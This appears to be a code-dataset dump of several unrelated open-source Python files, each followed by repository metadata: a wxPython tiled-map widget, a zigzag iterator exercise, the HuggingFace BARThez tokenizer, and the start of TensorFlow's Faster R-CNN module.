self.SetCursor(wx.StockCursor(wx.CURSOR_CROSS))
(self.sbox_w, self.sbox_h) = (0, 0)
(self.sbox_1_x, self.sbox_1_y) = click_posn
event.Skip()
def OnRightUp(self, event):
"""Right mouse button up.
Note that when we iterate through the layer_z_order list we must
iterate on a *copy* as the user select process can modify
self.layer_z_order.
"""
if self.ignore_next_right_up:
self.ignore_next_right_up = False
return
self.SetCursor(wx.StockCursor(wx.CURSOR_DEFAULT))
# we need a repaint to remove any selection box, but NOT YET!
delayed_paint = self.sbox_1_x # True if box select active
# if any layers interested, inform of possible select
if self.is_box_select:
# possible box selection
ll_corner_v = (self.sbox_1_x, self.sbox_1_y)
tr_corner_v = (self.sbox_1_x + self.sbox_w,
self.sbox_1_y + self.sbox_h)
ll_corner_m = self.ConvertView2Geo(ll_corner_v)
tr_corner_m = self.ConvertView2Geo(tr_corner_v)
# check each layer for a box select event
# we work on a copy as user response could change order
for id in self.layer_z_order[:]:
l = self.layer_mapping[id]
if l.selectable and l.visible: # and l.event_box_select:
if l.map_rel:
# map-relative, get all points selected (if any)
pts = self.layerBSelHandler[l.type](l, ll_corner_m,
tr_corner_m)
else:
# view-relative
pts = self.layerBSelHandler[l.type](l, ll_corner_v,
tr_corner_v)
self.RaiseSelectEvent(EventRightBoxSelect, l, pts)
# user code possibly updated screen
delayed_paint = True
self.is_box_select = False
else:
# possible point selection
clickpt_v = event.GetPositionTuple() if WX3 else event.GetPosition()
clickpt_m = self.ConvertView2Geo(clickpt_v)
# check each layer for a point select callback
# we work on a copy as user callback could change order
for id in self.layer_z_order[:]:
l = self.layer_mapping[id]
# if layer visible, selectable and there is a callback
if l.selectable and l.visible:
if l.map_rel:
pt = self.layerPSelHandler[l.type](l, clickpt_m)
else:
pt = self.layerPSelHandler[l.type](l, clickpt_v)
self.RaiseSelectEvent(EventRightPointSelect, l, pt,
mposn=clickpt_m,
vposn=clickpt_v)
# user code possibly updated screen
delayed_paint = True
# turn off box selection mechanism
self.is_box_select = False
self.sbox_1_x = self.sbox_1_y = None
# force PAINT event to remove selection box (if required)
if delayed_paint:
self.Update()
def OnRightDClick(self, event):
"""Right mouse button double-click."""
# ignore next RIGHT UP event
self.ignore_next_right_up = True
def OnMouseWheel(self, event):
"""Mouse wheel event."""
# get current mouse position
mouse_x, mouse_y = event.GetPositionTuple() if WX3 else event.GetPosition()
mouse_latlon = self.ConvertView2Geo((mouse_x, mouse_y))
# get center of view in map coords
x, y = self.view_width/2, self.view_height/2
# determine which way to zoom, & *can* we zoom?
if event.GetWheelRotation() > 0:
if self.ZoomToLevel(self.level + 1):
self.ZoomIn((x, y), update=False)
else:
if self.ZoomToLevel(self.level - 1):
self.ZoomOut((x, y), update=False)
# Translate the map so that the point under the mouse cursor is the same
# after zooming in/out as before
new_mouse_x, new_mouse_y = self.ConvertGeo2View(mouse_latlon)
new_center = (x + (new_mouse_x - mouse_x),
y + (new_mouse_y - mouse_y))
self.GotoPosition(self.ConvertView2Geo(new_center))
# Raise position event to update the status text.
self.RaiseMousePositionEvent(event.GetPositionTuple() if WX3 else event.GetPosition())
######
# Method that overrides _BufferedCanvas.Draw() method.
# This code does the actual drawing of tiles, layers, etc.
######
def Draw(self, dc):
"""Do actual map tile and layers drawing.
Overrides the _BufferedCanvas.draw() method.
dc device context to draw on
The idea is to create 3 data structures that define the tiles
to be drawn and where to draw them:
row_list list (left -> right) of tile rows
col_list list (left -> right) of tile columns
posn position at which to draw first (top-left) tile
We will need this when we go to the 'wrap-around' feature.
"""
# figure out how to draw tiles
if False:# self.view_offset_x < 0: # NKS No wrapping or hard boundaries
# View > Map in X - centre in X direction
if self.EW_wrap:
tile_margin = ((-self.view_offset_x + self.tile_size_x - 1) //
self.tile_size_x)
col_start = (self.tiles.num_tiles_x -
tile_margin % self.tiles.num_tiles_x)
col_list = []
for i in range(2 * tile_margin + self.tiles.num_tiles_x):
ii = (i + col_start) % self.tiles.num_tiles_x
col_list.append(ii)
x_pix = (self.view_offset_x
+ (tile_margin - 1) * self.tile_size_x)
else:
col_list = range(0, self.tiles.num_tiles_x)
x_pix = -self.view_offset_x
else:
# Map > View - determine layout in X direction
x_offset = self.view_offset_x + self.move_dx
import math # NKS allow negative tile coordinates
start_x_tile = int(math.floor(x_offset / self.tile_size_x))
stop_x_tile = ((x_offset + self.view_width + self.tile_size_x - 1)
/ self.tile_size_x)
stop_x_tile = int(stop_x_tile)
col_list = range(start_x_tile, stop_x_tile)
x_pix = start_x_tile * self.tile_size_y - x_offset
if False:#self.view_offset_y < 0: # NKS No wrapping or hard boundaries
# View > Map in Y - centre in Y direction
if self.NS_wrap:
tile_margin = ((-self.view_offset_y + self.tile_size_y - 1)
// self.tile_size_y)
row_start = (self.tiles.num_tiles_y
- tile_margin % self.tiles.num_tiles_y)
row_list = []
for i in range(2 * tile_margin + self.tiles.num_tiles_y):
ii = (i + row_start) % self.tiles.num_tiles_y
row_list.append(ii)
y_pix_start = self.view_offset_y + \
(tile_margin - 1) * self.tile_size_y
else:
row_list = range(0, self.tiles.num_tiles_y)
y_pix_start = -self.view_offset_y
else:
y_offset = self.view_offset_y + self.move_dy
start_y_tile = int(math.floor(y_offset / self.tile_size_y))
stop_y_tile = ((y_offset + self.view_height
+ self.tile_size_y - 1) / self.tile_size_y)
stop_y_tile = int(stop_y_tile)
row_list = range(start_y_tile, stop_y_tile)
y_pix_start = start_y_tile * self.tile_size_y - y_offset
# start pasting tiles onto the view
for x in col_list:
y_pix = y_pix_start
for y in row_list:
dc.DrawBitmap(self.tiles.GetTile(x, y), x_pix, y_pix, False)
y_pix += self.tile_size_y
x_pix += self.tile_size_x
# draw layers
for id in self.layer_z_order:
l = self.layer_mapping[id]
if l.visible and self.level in l.show_levels:
l.painter(dc, l.data, map_rel=l.map_rel)
# draw selection rectangle, if any
if self.sbox_1_x:
penclr = wx.Colour(0, 0, 255)
dc.SetPen(wx.Pen(penclr, width=1))
brushclr = wx.Colour(0, 0, 0)
dc.SetBrush(wx.Brush(brushclr, style=wx.TRANSPARENT))
dc.DrawRectangle(self.sbox_1_x, self.sbox_1_y,
self.sbox_w, self.sbox_h)
######
# Miscellaneous
######
def ResizeCallback(self, event=None):
"""Handle a window resize.
event that caused the resize, may be None (not used)
Handle all possible states of view and map:
. new view entirely within map
. map smaller than view (just centre map)
Set up view state.
"""
# get new size of the view
(self.view_width, self.view_height) = self.GetClientSizeTuple() if WX3 else self.GetClientSize()
# if map > view in X axis
if self.map_width > self.view_width:
self.max_x_offset = self.map_width - self.view_width
# NKS allow background to show
# do nothing unless background is showing
# if map left edge right of view edge
#if self.view_offset_x < 0:
# # move view to hide background at left
# self.view_offset_x = 0
#elif self.view_offset_x + self.view_width > self.map_width:
# # move view to hide background at right
# self.view_offset_x = self.map_width - self.view_width
else:
# else view >= map - centre map in X direction
self.max_x_offset = self.map_width - self.view_width
# if map > view in Y axis
if self.map_height > self.view_height:
self.max_y_offset = self.map_height - self.view_height
# NKS allow background to show
# do nothing unless background is showing
# if map top edge below view edge
#if self.view_offset_y < 0:
# # move view to hide background at top
# self.view_offset_y = 0
#elif self.view_offset_y + self.view_height > self.map_height:
# # move view to hide background at bottom
# self.view_offset_y = self.map_height - self.view_height
else:
# else view >= map - centre map in Y direction
self.max_y_offset = self.map_height - self.view_height
# set the left/right/top/bottom lon/lat extents
self.RecalcViewLonLatLimits()
def RecalcViewLonLatLimits(self):
"""Recalculate the view lon/lat extent values.
Assumes only the .view_offset_? and .ppd_? values have been set.
"""
self.view_llon = self.map_llon + self.view_offset_x / self.ppd_x
self.view_rlon = self.view_llon + self.view_width / self.ppd_x
self.view_tlat = self.map_tlat - self.view_offset_y / self.ppd_y
self.view_blat = self.view_tlat - self.view_height / self.ppd_y
def ZoomToLevel(self, level):
"""Use a new tile level.
level the new tile level to use.
Returns True if all went well.
Maintain centre of map, if possible.
"""
if self.min_level <= level <= self.max_level:
map_extent = self.tiles.UseLevel(level)
if map_extent:
self.level = level
(self.map_width, self.map_height,
self.ppd_x, self.ppd_y) = map_extent
(self.map_llon, self.map_rlon,
self.map_blat, self.map_tlat) = self.tiles.extent
# do level change callback
self.RaiseLevelChangeEvent(level)
return True
return False
def GetMapCoordsFromView(self, posn):
"""Convert view pixel coordinates to map coordinates.
posn is a tuple (x, y) of view pixel coordinates
Returns (x, y) map pixel coordinates.
"""
# unpack the position
(view_x, view_y) = posn
# calculate map coords
map_x = view_x + self.view_offset_x
map_y = view_y + self.view_offset_y
return (map_x, map_y)
######
# Select helpers - get objects that were selected
######
def GetNearestPointInLayer(self, layer, pt):
"""Determine if clicked location selects a point in layer data.
layer layer object we are looking in
pt click geo location (lon, lat) or screen (x, y)
Return None (no selection) or ((x, y), data) of closest point.
"""
# TODO: speed this up? Do we need to??
# http://en.wikipedia.org/wiki/Kd-tree
# would need to create kd-tree in AddLayer()
(ptx, pty) = pt
res = None
dist = 9999999.0 # more than possible
if layer.map_rel:
for p in layer.data:
(x, y, _, _, _, _, _, data) = p
d = (x - ptx) * (x - ptx) + (y - pty) * (y - pty)
if d < dist:
dist = d
res = ((x, y), data)
if dist <= layer.delta:
return res
else:
for p in layer.data:
dc = wx.BufferedPaintDC(self, self.buffer)
(dc_w, dc_h) = dc.GetSize()
dc_w2 = dc_w / 2
dc_h2 = dc_h / 2
dc_h -= 1
dc_w -= 1
(x, y, place, _, _, x_off, y_off, pdata) = p
exec(self.point_view_placement[place])
d = (x - ptx) * (x - ptx) + (y - pty) * (y - pty)
if d < dist:
dist = d
res = ((x, y), pdata)
if dist <= layer.delta:
return res
return None
def GetBoxSelPointsInLayer(self, layer, p1, p2):
"""Get list of points inside box.
layer reference to layer object we are working on
p1 one corner point of selection box
p2 opposite corner point of selection box
We have to figure out which corner is which.
Return a list of (lon, lat) of points inside box.
Return None (no selection) or list [((lon, lat), data), ...]
of points inside the selection box.
"""
# TODO: speed this up? Do we need to??
# get canonical box limits
(p1x, p1y) = p1
(p2x, p2y) = p2
lx = min(p1x, p2x) # left x coord
rx = max(p1x, p2x)
ty = max(p1y, p2y) # top y coord
by = min(p1y, p2y)
# get a list of points inside the selection box
result = []
if layer.map_rel:
for p in layer.data:
(x, y, _, _, _, _, _, pdata) = p
if lx <= x <= rx and by <= y <= ty:
result.append(((x, y), pdata))
else:
for p in layer.data:
dc = wx.BufferedPaintDC(self, self.buffer)
(dc_w, dc_h) = dc.GetSize()
dc_w2 = dc_w / 2
dc_h2 = dc_h / 2
dc_h -= 1
dc_w -= 1
(x, y, place, _, _, x_off, y_off, pdata) = p
exec(self.point_view_placement[place])
if lx <= x <= rx and by <= y <= ty:
result.append(((x, y), pdata))
return result
def GetNearestImageInLayer(self, layer, pt):
"""Decide if clicked location selects an image object in layer data.
layer layer object we are looking in
pt click geo location (lon, lat)
Return None (no selection) or data for closest image.
"""
(ptx, pty) = pt
res = None
dist = 9999999.0 # more than possible
for p in layer.data:
x = p[0]
y = p[1]
d = (x - ptx) * (x - ptx) + (y - pty) * (y - pty)
if d < dist:
dist = d
res = (x, y)
if dist <= layer.delta:
return res
return None
def GetBoxSelImagesInLayer(self, layer, p1, p2):
"""Get list of images inside box p1-p2.
layer reference to layer object we are working on
p1 one corner point of selection box
p2 opposite corner point of selection box
We have to figure out which corner is which.
Return a list of (lon, lat) of points inside box.
"""
# get canonical box limits
(p1x, p1y) = p1
(p2x, p2y) = p2
lx = min(p1x, p2x) # left x coord
rx = max(p1x, p2x)
ty = max(p1y, p2y) # top y coord
by = min(p1y, p2y)
result = []
for p in layer.data:
x = p[0]
y = p[1]
if lx <= x <= rx and by <= y <= ty:
result.append((x, y))
return result
def GetNearestPolygonInLayer(self, layer, pt):
"""Get nearest polygon object in layer data.
layer layer object we are looking in
pt click geo location (lon, lat)
Return None (no selection) or data for closest polygon.
Code here originally supplied by Stefan Harwarth, from
[http://paulbourke.net/geometry/insidepoly/].
"""
(ptx, pty) = pt
for poly in layer.data:
p = poly[0]
if point_inside_polygon(ptx, pty, p):
return p
return None
def GetBoxSelPolygonsInLayer(self, layer, p1, p2):
"""Get list of polygons inside box p1-p2.
layer reference to layer object we are working on
p1 one corner point of selection box
p2 opposite corner point of selection box
We have to figure out which corner is which.
Return a list of (lon, lat) of points inside box.
"""
return []
def GetNearestTextInLayer(self, layer, pt):
"""Determine if clicked location selects a text object in layer data.
layer layer object we are looking in
pt click geo location (lon, lat)
Return None (no selection) or data for closest text.
Just search for text 'hotspot' - just like point select.
Later make text sensitive (need text extent data).
"""
(ptx, pty) = pt
res = None
dist = 1.0E+100 # more than possible
for p in layer.data:
(x, y, _, _, _, _, _, _, _, _, _, data) = p
d = (x - ptx) * (x - ptx) + (y - pty) * (y - pty)
if d < dist:
dist = d
res = ((x, y), data)
if dist <= layer.delta:
return res
return None
def GetBoxSelTextsInLayer(self, layer, p1, p2):
"""Get list of text objects inside box p1-p2.
layer reference to layer object we are working on
p1 one corner point of selection box
p2 opposite corner point of selection box
We have to figure out which corner is which.
Return a list of (lon, lat) of points inside box.
Return None (no selection) or list [((lon, lat), data), ...]
of points inside the selection box.
"""
# get canonical box limits
(p1x, p1y) = p1
(p2x, p2y) = p2
lx = min(p1x, p2x) # left x coord
rx = max(p1x, p2x)
ty = max(p1y, p2y) # top y coord
by = min(p1y, p2y)
# get a list of points inside the selection box
result = []
for p in layer.data:
(x, y, _, _, _, _, _, _, _, _, _, data) = p
if lx <= x <= rx and by <= y <= ty:
result.append(((x, y), data))
return result
######
# The next two routines could be folded into one as they are the same.
# However, if we ever implement a 'staged' zoom, we need both routines.
######
def ZoomIn(self, xy, update=True):
"""Zoom map in to the next level.
xy is a tuple (x, y) of pixel coords of new centre after zoom
if update == True (default) then self.Update() is called to redraw the canvas.
The tile stuff has already been set to the correct level.
"""
# set view state
(map_x, map_y) = self.GetMapCoordsFromView(xy)
self.view_offset_x = map_x * 2 - self.view_width / 2
self.view_offset_y = map_y * 2 - self.view_height / 2
# set some internal state through size code
self.ResizeCallback()
if update:
self.Update()
def ZoomOut(self, xy, update=True):
"""Zoom map out to the previous level.
xy is a tuple (x, y) of pixel coords of new centre after zoom
The tile stuff has already been set to the correct level.
"""
# set view state
(map_x, map_y) = self.GetMapCoordsFromView(xy)
self.view_offset_x = map_x / 2 - self.view_width / 2
self.view_offset_y = map_y / 2 - self.view_height / 2
# set some internal state through size code
self.ResizeCallback()
if update:
self.Update()
######
# Routines for pySlip events
######
# there is no set_select_event() method and no self.select_event boolean
# flag as the user controls selectability on a layer-by-layer basis.
def RaiseSelectEvent(self, evtype, layer, point, mposn=None, vposn=None):
"""Raise a point SELECT event.
evtype select event type
layer layer the select was on
point point(s) selected, ie, a single or list of point tuples:
((x, y), data)
mposn map coordinates of the mouse click
vposn view coordinates of the mouse click
Note: this could be a BOX select, ie, multiple points in 'point'.
"""
event = _PySlipEvent(_myEVT_PYSLIP_SELECT, self.GetId())
event.evtype = evtype
event.layer_id = layer.id
event.point = point
event.mposn = mposn
event.vposn = vposn
self.GetEventHandler().ProcessEvent(event)
def SetLevelChangeEvent(self, event):
"""Set event routine on level change.
event True if event is to be raised on change
"""
self.change_level_event = event
def RaiseLevelChangeEvent(self, level):
"""Raise a LEVEL event."""
if self.change_level_event:
event = _PySlipEvent(_myEVT_PYSLIP_LEVEL, self.GetId())
event.level = level
self.GetEventHandler().ProcessEvent(event)
def SetMousePositionEvent(self, event):
"""Set callback function on mouse move.
event True if event is to be raised on mouse move
"""
self.mouse_position_event = event
def RaiseMousePositionEvent(self, posn):
"""Raise a mouse position event.
posn the new mouse position (in view pixel coordinates)
"""
if self.mouse_position_event:
event = _PySlipEvent(_myEVT_PYSLIP_POSITION, self.GetId())
if posn and self.PositionIsOnMap(posn):
event.position = self.ConvertView2Geo(posn)
else:
event.position = None
self.GetEventHandler().ProcessEvent(event)
def PositionIsOnMap(self, posn):
"""Return True if 'posn' is actually on map (not just view).
posn a tuple (x,y) position in view pixel coordinates
"""
return True #NKS always accept mouse coordinates
(x, y) = posn
if self.view_offset_x < 0:
if x < -self.view_offset_x:
return False
if x > self.view_width + self.view_offset_x:
return False
if self.view_offset_y < 0:
if y < -self.view_offset_y:
return False
if y > self.view_height + self.view_offset_y:
return False
return True
def get_i18n_kw(self, kwargs, kws, default):
"""Get alternate international keyword value.
kwargs dictionary to look for keyword value
kws iterable of keyword spelling strings
default default value if no keyword found
Returns the keyword value.
"""
result = None
for kw_str in kws[:-1]:
result = kwargs.get(kw_str, None)
if result:
break
else:
result = kwargs.get(kws[-1], default)
return result
| 37.29952 | 104 | 0.544487 |
59b78fc2bbe8633851ad3b6c7acd28436858b8d6 | 1,058 | py | Python | CONTENT/Resources/guides/__UNSORTED/281_zigzag_iterator/iterator.py | impastasyndrome/DS-ALGO-OFFICIAL | c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a | [
"Apache-2.0"
] | 13 | 2021-03-11T00:25:22.000Z | 2022-03-19T00:19:23.000Z | CONTENT/Resources/guides/__UNSORTED/281_zigzag_iterator/iterator.py | impastasyndrome/DS-ALGO-OFFICIAL | c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a | [
"Apache-2.0"
] | 162 | 2021-03-09T01:52:11.000Z | 2022-03-12T01:09:07.000Z | CONTENT/Resources/guides/__UNSORTED/281_zigzag_iterator/iterator.py | impastasyndrome/DS-ALGO-OFFICIAL | c85ec9cf0af0009f038b7a571a7ac1fb466b7f3a | [
"Apache-2.0"
] | 12 | 2021-04-26T19:43:01.000Z | 2022-01-31T08:36:29.000Z | class ZigzagIterator(object):
def __init__(self, v1, v2):
"""
Initialize your data structure here.
:type v1: List[int]
:type v2: List[int]
"""
self.index = 0
self.numbers = [v1, v2]
self.positions = [0, 0]
def next(self):
"""
:rtype: int
"""
v = self.numbers[self.index]
pos = self.positions[self.index]
if pos < len(v):
value = v[pos]
self.positions[self.index] += 1
self.index = (self.index + 1) % 2
return value
else:
if self.hasNext():
self.index = (self.index + 1) % 2
return self.next()
else:
return None
def hasNext(self):
"""
:rtype: bool
"""
return any([self.positions[i] < len(self.numbers[i]) for i in range(2)])
# Your ZigzagIterator object will be instantiated and called as such:
# i, v = ZigzagIterator(v1, v2), []
# while i.hasNext(): v.append(i.next())
| 26.45 | 80 | 0.489603 |
2d669ff8db3da96c21a5b7b70a3dfc56772c04e1 | 10,170 | py | Python | src/transformers/models/barthez/tokenization_barthez_fast.py | marcoabrate/transformers | 3f77c26d74e1282955fefa8dfff2451e44f6d4a9 | [
"Apache-2.0"
] | 1 | 2021-02-22T02:52:17.000Z | 2021-02-22T02:52:17.000Z | src/transformers/models/barthez/tokenization_barthez_fast.py | marcoabrate/transformers | 3f77c26d74e1282955fefa8dfff2451e44f6d4a9 | [
"Apache-2.0"
] | null | null | null | src/transformers/models/barthez/tokenization_barthez_fast.py | marcoabrate/transformers | 3f77c26d74e1282955fefa8dfff2451e44f6d4a9 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 Ecole Polytechnique and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
""" Tokenization classes for the BARThez model."""
import os
from shutil import copyfile
from typing import List, Optional, Tuple
from ...file_utils import is_sentencepiece_available
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging
if is_sentencepiece_available():
from .tokenization_barthez import BarthezTokenizer
else:
BarthezTokenizer = None
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "sentencepiece.bpe.model", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"moussaKam/mbarthez": "https://huggingface.co/moussaKam/mbarthez/resolve/main/sentencepiece.bpe.model",
"moussaKam/barthez": "https://huggingface.co/moussaKam/barthez/resolve/main/sentencepiece.bpe.model",
"moussaKam/barthez-orangesum-title": "https://huggingface.co/moussaKam/barthez-orangesum-title/resolve/main/sentencepiece.bpe.model",
},
"tokenizer_file": {
"moussaKam/mbarthez": "https://huggingface.co/moussaKam/mbarthez/resolve/main/tokenizer.json",
"moussaKam/barthez": "https://huggingface.co/moussaKam/barthez/resolve/main/tokenizer.json",
"moussaKam/barthez-orangesum-title": "https://huggingface.co/moussaKam/barthez-orangesum-title/resolve/main/tokenizer.json",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"moussaKam/mbarthez": 1024,
"moussaKam/barthez": 1024,
"moussaKam/barthez-orangesum-title": 1024,
}
SPIECE_UNDERLINE = "▁"
class BarthezTokenizerFast(PreTrainedTokenizerFast):
"""
Adapted from :class:`~transformers.CamembertTokenizer` and :class:`~transformers.BartTokenizer`. Construct a "fast"
BARThez tokenizer. Based on `SentencePiece <https://github.com/google/sentencepiece>`__.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizerFast` which contains most of the main
methods. Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (:obj:`str`):
`SentencePiece <https://github.com/google/sentencepiece>`__ file (generally has a `.spm` extension) that
contains the vocabulary necessary to instantiate a tokenizer.
bos_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the :obj:`cls_token`.
eos_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The end of sequence token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the end of
sequence. The token used is the :obj:`sep_token`.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (:obj:`str`, `optional`, defaults to :obj:`"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
additional_special_tokens (:obj:`List[str]`, `optional`, defaults to :obj:`["<s>NOTUSED", "</s>NOTUSED"]`):
Additional special tokens used by the tokenizer.
Attributes: sp_model (:obj:`SentencePieceProcessor`): The `SentencePiece` processor that is used for every
conversion (string, tokens and IDs).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
slow_tokenizer_class = BarthezTokenizer
def __init__(
self,
vocab_file,
tokenizer_file=None,
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
**kwargs
):
super().__init__(
vocab_file,
tokenizer_file=tokenizer_file,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
**kwargs,
)
self.vocab_file = vocab_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A BARThez sequence has the following format:
- single sequence: ``<s> X </s>``
- pair of sequences: ``<s> A </s></s> B </s>``
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` method.
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
:obj:`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formated with special tokens for the model."
)
return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task.
Args:
token_ids_0 (:obj:`List[int]`):
List of IDs.
token_ids_1 (:obj:`List[int]`, `optional`):
Optional second list of IDs for sequence pairs.
Returns:
:obj:`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
return
out_vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):
copyfile(self.vocab_file, out_vocab_file)
return (out_vocab_file,)
| 44.217391 | 141 | 0.650246 |
56d83a80a5836531e7411aac3f6c255aafe651f6 | 138,151 | py | Python | research/object_detection/meta_architectures/faster_rcnn_meta_arch.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 10 | 2020-06-30T06:43:48.000Z | 2022-03-22T11:01:20.000Z | research/object_detection/meta_architectures/faster_rcnn_meta_arch.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 10 | 2019-12-28T21:31:19.000Z | 2020-04-12T20:01:58.000Z | research/object_detection/meta_architectures/faster_rcnn_meta_arch.py | 873040/Abhishek | 2ddd716e66bc5cc6e6f0787508dd07da0e02e75a | [
"Apache-2.0"
] | 9 | 2020-03-30T02:11:52.000Z | 2020-04-05T02:15:08.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Faster R-CNN meta-architecture definition.
General tensorflow implementation of Faster R-CNN detection models.
See Faster R-CNN: Ren, Shaoqing, et al.
"Faster R-CNN: Towards real-time object detection with region proposal
networks." Advances in neural information processing systems. 2015.
We allow for three modes: number_of_stages={1, 2, 3}. In case of 1 stage,
all of the user facing methods (e.g., predict, postprocess, loss) can be used as
if the model consisted only of the RPN, returning class agnostic proposals
(these can be thought of as approximate detections with no associated class
information). In case of 2 stages, proposals are computed, then passed
through a second stage "box classifier" to yield (multi-class) detections.
Finally, in case of 3 stages which is only used during eval, proposals are
computed, then passed through a second stage "box classifier" that will compute
refined boxes and classes, and then features are pooled from the refined and
non-maximum suppressed boxes and are passed through the box classifier again. If
number of stages is 3 during training it will be reduced to two automatically.
Implementations of Faster R-CNN models must define a new
FasterRCNNFeatureExtractor and override three methods: `preprocess`,
`_extract_proposal_features` (the first stage of the model), and
`_extract_box_classifier_features` (the second stage of the model). Optionally,
the `restore_fn` method can be overridden. See tests for an example.
A few important notes:
+ Batching conventions: We support batched inference and training where
all images within a batch have the same resolution. Batch sizes are determined
dynamically via the shape of the input tensors (rather than being specified
directly as, e.g., a model constructor).
A complication is that due to non-max suppression, we are not guaranteed to get
the same number of proposals from the first stage RPN (region proposal network)
for each image (though in practice, we should often get the same number of
proposals). For this reason we pad to a max number of proposals per image
within a batch. This `self.max_num_proposals` property is set to the
`first_stage_max_proposals` parameter at inference time and the
`second_stage_batch_size` at training time since we subsample the batch to
be sent through the box classifier during training.
For the second stage of the pipeline, we arrange the proposals for all images
within the batch along a single batch dimension. For example, the input to
_extract_box_classifier_features is a tensor of shape
`[total_num_proposals, crop_height, crop_width, depth]` where
total_num_proposals is batch_size * self.max_num_proposals. (And note that per
the above comment, a subset of these entries correspond to zero paddings.)
+ Coordinate representations:
Following the API (see model.DetectionModel definition), our outputs after
postprocessing operations are always normalized boxes however, internally, we
sometimes convert to absolute --- e.g. for loss computation. In particular,
